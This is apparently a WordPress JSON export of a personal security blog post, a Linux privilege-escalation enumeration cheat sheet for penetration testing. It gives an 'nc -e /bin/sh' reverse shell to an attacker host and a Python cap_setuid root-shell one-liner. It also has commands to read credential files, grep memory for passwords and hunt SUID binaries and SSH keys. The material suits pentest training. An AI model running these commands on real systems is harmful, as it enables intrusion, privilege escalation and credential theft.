{"id":2307,"date":"2021-01-10T14:16:08","date_gmt":"2021-01-10T13:16:08","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2307"},"modified":"2025-11-09T10:00:12","modified_gmt":"2025-11-09T09:00:12","slug":"basic-linux-system-enumeration","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2307","title":{"rendered":"Basic Linux system enumeration"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">If your con\u00adsole is nar\u00adrow, widen it at the beginning:<\/p>\n\n\n\n<pre id=\"block-178190d5-64e1-41ba-bee6-51b9d64a8780\" class=\"wp-block-preformatted\">stty rows 50 cols 200<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00adsid\u00ader to direct\u00adly spawn anoth\u00ader reverse shell:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -e \/bin\/sh $attackerip 4444 &amp;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Basic enu\u00admer\u00ada\u00adtion about the&nbsp;host<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">id<br>groups<br>cat \/etc\/passwd<br>cat \/etc\/group<br>cat \/etc\/hosts<br>cat \/etc\/fstab<br>uname -a \/\/ Check for kernel exploits<br>         \/\/ ALSO search for kernel exploits with OS name!<br>         \/\/ If this doesn't work: cat \/proc\/version<br>sudo -l \/\/ <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1546\">See blog post about details.<\/a><br>su \/\/ same password, if known<br>cat \/etc\/fstab &amp;&amp; lsblk || mount \/\/ if there is something to mount, mount it.<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check chron:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">cat \/etc\/crontab<br>cd \/etc\/cron.d...<br>grep \"CRON\" \/var\/log\/syslog<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Look into the home and some oth\u00ader directories:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">cd \/home &amp;&amp; find ...<br>cd \/root<br>cd \/etc\/profile.d<br>cd \/opt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">See what\u2019s installed:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ps aux \/\/ Note all process which run with root permissions (mysql...)<br>systemctl \/\/ shows all services, active and inactive!<br>systemctl status \/\/ hierarchical view of all active services.<br>dpkg -i \/\/ or other, depending the distro<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Browse through the&nbsp;logs<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>On old sys\u00adtems: Browse throuh the files:<br><code>cd \/var\/log<\/code><\/li>\n\n\n\n<li>Sytems with systemd:&nbsp;<ul class=\"wp-block-list\">\n<li>See all:<br><code>journalctl<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Check for files from inter\u00adest\u00ading&nbsp;users<\/p>\n\n\n\n<pre id=\"block-686a7b6c-ef37-4dd7-903f-22343eaec5a6\" class=\"wp-block-preformatted\">for user in u1 u2; do\n  find \/ -user $user 2&gt; \/dev\/null | grep -v \\\/proc;\n  find \/ -group $user 2&gt; \/dev\/null | grep -v \\\/proc; \n done<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If there is only the cur\u00adrent user, use&nbsp;this:<\/p>\n\n\n\n<pre id=\"block-60d34457-5c09-4edb-a105-44850e07b5c1\" class=\"wp-block-preformatted\">find \/ -user $user 2&gt; \/dev\/null | grep -v \\\/proc;\nfind \/ -group $user 2&gt; \/dev\/null | grep -v \\\/proc; <\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">More things to&nbsp;do:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Search for <span class=\"caps\">SSH<\/span> key&nbsp;files<\/li>\n\n\n\n<li>Inves\u00adti\u00adgate user cron files (<a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Linux%20-%20Privilege%20Escalation.md\">See here for a list of all pos\u00adsi\u00adble cron files.<\/a>)<\/li>\n\n\n\n<li>Inves\u00adti\u00adgate web serv\u00ader con\u00adfig\u00adu\u00adra\u00adtion&nbsp;files<\/li>\n\n\n\n<li>Inves\u00adti\u00adgate email directories.<\/li>\n\n\n\n<li>Search for <span class=\"caps\">SUID<\/span> and <span class=\"caps\">SGUID<\/span> files. Note that the minus sign means <em>mask mode<\/em>.<br><code>find \/ -perm -2000 -o -perm -4000 -print 2&gt;\/dev\/null<\/code><\/li>\n\n\n\n<li>Search for world write read\u00adable files:<br><code>find . -perm -o+r<\/code><\/li>\n\n\n\n<li>Search for direc\u00adto\u00adries you can write into:<br><code>find \/ -writable -type d 2&gt;\/dev\/null<\/code><\/li>\n\n\n\n<li>Search for files with\u00adin a time win\u00addow:<br><code>find \/ -newermt 2020-01-02 ! -newermt 2020-02-01 2&gt; \/dev\/null<\/code><\/li>\n\n\n\n<li>Scan the mem\u00ado\u00adry for pass\u00adwords<br><code>strings \/dev\/mem -n10 | grep -i PASS<\/code><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Network enumeration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Show net\u00adwork configuration<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ifconfig<br>ip a<br>ss -natup<br>netstat -tulpen<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">List open ports. Note them in your list and enu\u00admer\u00adate them (maybe via forwarding).<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netstat -natup \/\/ If you can, use sudo to see all binaries.\nnetstat -ano<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Have a look into the pack\u00adet fil\u00adter, e.g.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">cat \/etc\/iptables\/rules.v4<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">List active neigh\u00adbour systems<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ip neigh\narp -en<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Various more unprobably things to&nbsp;try<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Check unusu\u00adal capa\u00adbil\u00adi\u00adties (<a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=4175\" data-type=\"post\" data-id=\"4175\">See the Lin\u00adux secu\u00adri\u00adty fun\u00adda\u00admen\u00adtals post<\/a>, if found some\u00adthing; For exam\u00adple, if an inter\u00adpreter like Python should have <code>cap_setuid+ep<\/code> set, then it can change its uid although in a user process. (In this case: <code>python2.7 -c 'import os; os.setuid(0); os.system(\"\/bin\/bash\");'<\/code>))<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">getcap \/\/ try this first. If the binary is not on the system, the following command returns always null :) Sometimes it is in \/usr\/sbin\/getcap<br>getcap -r \/ 2&gt;\/dev\/null<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Try to see if AppAr\u00admor is installed:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">aa-status<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">More things:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">debsums | grep -v O<br>tmux ls<br>screen -list<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>If your con\u00adsole is nar\u00adrow, widen it at the begin\u00adning: stty rows 50 cols 200 Con\u00adsid\u00ader to direct\u00adly spawn anoth\u00ader reverse shell: nc \u2011e \/bin\/sh $attack\u00aderip 4444 <span class=\"amp\">&amp;<\/span> Basic enu\u00admer\u00ada\u00adtion about the&nbsp;host idgroup\u00adscat \/etc\/passwdcat \/etc\/groupcat \/etc\/hostscat \/etc\/fstabuname \u2011a \/\/ Check for ker\u00adnel exploits \/\/ <span class=\"caps\">ALSO<\/span> search for ker\u00adnel exploits with <span class=\"caps\">OS<\/span> name! \/\/ If&nbsp;this&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471,483],"tags":[50,33],"class_list":["post-2307","post","type-post","status-publish","format-standard","hentry","category-privesc","category-howtos","tag-enumeration","tag-linux"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2307"}],"version-history":[{"count":44,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2307\/revisions"}],"predecessor-version":[{"id":4929,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2307\/revisions\/4929"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}